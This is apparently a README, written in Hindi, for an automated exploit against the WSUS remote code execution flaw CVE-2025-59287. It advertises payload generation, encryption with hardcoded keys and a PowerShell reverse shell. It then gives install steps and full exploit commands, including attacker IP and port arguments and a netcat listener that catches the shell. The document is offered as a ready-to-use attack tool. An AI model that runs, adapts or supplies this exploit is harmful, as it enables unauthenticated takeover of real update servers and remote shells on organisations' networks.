
CVE-2025-59287 के लिए स्वचालित एक्सप्लॉइट, WSUS में एक अनप्रमाणित RCE, जिसमें पेलोड जनरेशन, रिवर्स शेल लिसनर, और हार्डकोडेड कुंजियों के साथ AES एन्क्रिप्शन शामिल है।
Windows Server Update Services (WSUS) में अनधिकृत रिमोट कोड निष्पादन भेद्यता के लिए स्वचालित एक्सप्लॉइट।
✅ पूरी तरह से स्वचालित पेलोड जनरेशन
✅ ysoserial.NET निर्भरता का स्वचालित डाउनलोड
✅ अंतर्निहित रिवर्स शेल लिसनर
✅ क्रॉस-प्लेटफ़ॉर्म समर्थन (Windows/Linux/Mac)
✅ WSUS हार्डकोडेड कुंजियों के साथ AES एन्क्रिप्शन
✅ PowerShell रिवर्स शेल पेलोड
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
एक्सप्लॉइट फ़ाइलें क्लोन या डाउनलोड करें
cd CVE-2025-59287-exploit
एक्सप्लॉइट चलाएँ (ysoserial.NET स्वतः डाउनलोड होता है)
python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
टर्मिनल 1: नेटकैट लिसनर शुरू करें
nc -lvnp 4444
टर्मिनल 2: अंतर्निहित लिसनर के बिना एक्सप्लॉइट चलाएँ
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener